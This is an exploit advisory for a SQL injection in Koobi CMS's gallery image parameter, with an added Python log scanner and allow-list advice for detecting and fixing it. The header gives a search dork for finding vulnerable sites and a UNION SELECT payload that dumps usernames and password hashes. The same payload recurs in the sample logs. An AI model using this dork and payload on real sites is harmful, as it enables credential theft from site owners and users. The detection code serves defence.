# Ariko-Security: Security Audits, Audyt bezpieczenstwa
# Advisory: 711/2010
=====================================================
Koobi CMS (index.php) SQL Injection Vulnerability
=====================================================
# Exploit Title : Koobi CMS (index.php) SQL Injection Vulnerability
# Date : July 12 2010
# Author : SIL3NCIO
# Email : 617a6572@gmail.com
# Version: 4.3.0, 4.2.5 and 4.2.4; higher versions may be affected too
# Tested on: Windows XP SP3
# Dork : inurl:"index.php?p=gallerypic img_id"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Exploit~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[Exploit] : http://site.com/path/index.php?p=gallerypic&img_id=[SQLi]
-188+union+select+1,2,3,group_concat(username,0x3a,password),5,6,7,8,9+from+bb1_users--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
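Added example, not part of the original advisory and not Koobi's own code: a check that flags access-log requests to p=gallerypic whose img_id is not a plain integer, which is also the allow-list rule the application should enforce before building its query. It assumes img_id is meant to be a positive decimal integer and that the server writes Apache combined-format logs; the log lines, addresses and function names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (Apache combined format); addresses are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Jul/2010:10:01:02 +0000] "GET /index.php?p=gallerypic&img_id=188 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Jul/2010:10:03:17 +0000] "GET /index.php?p=gallerypic&img_id=-188+union+select+1,2,3,group_concat(username,0x3a,password),5,6,7,8,9+from+bb1_users-- HTTP/1.1" 200 6033 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Jul/2010:10:03:40 +0000] "GET /index.php?p=gallerypic&img_id=188%27 HTTP/1.1" 200 411 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Jul/2010:10:05:00 +0000] "GET /index.php?p=news&id=7 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.61 - - [12/Jul/2010:10:06:09 +0000] "GET /index.php?img_id=12&img_id=1%20UNION%20SELECT%201&p=gallerypic HTTP/1.1" 200 900 "-" "curl/7.20"
"""

# client, timestamp and request target of one combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumption: a legitimate img_id is 1-10 ASCII digits, nothing else.
VALID_ID = re.compile(r"[0-9]{1,10}")


def is_valid_img_id(value):
    """Allow-list check: the whole value must be ASCII digits."""
    return VALID_ID.fullmatch(value) is not None


def suspicious_requests(log_text):
    """Return (ip, timestamp, decoded img_id) for gallerypic requests with a non-integer img_id."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("index.php"):
            continue
        # parse_qs URL-decodes values and keeps repeated parameters as a list
        params = parse_qs(url.query, keep_blank_values=True)
        if "gallerypic" not in params.get("p", []):
            continue
        bad = [v for v in params.get("img_id", []) if not is_valid_img_id(v)]
        if bad:
            hits.append((m["ip"], m["ts"], bad[0]))
    return hits


if __name__ == "__main__":
    for ip, ts, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip} img_id={value!r}")
```

The same digits-only rule, applied in the application before the value reaches the database and combined with a parameterized query, removes the injection point rather than only detecting its use.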
Note : Proud to be Tunisian
[wrass la7nina sa7li]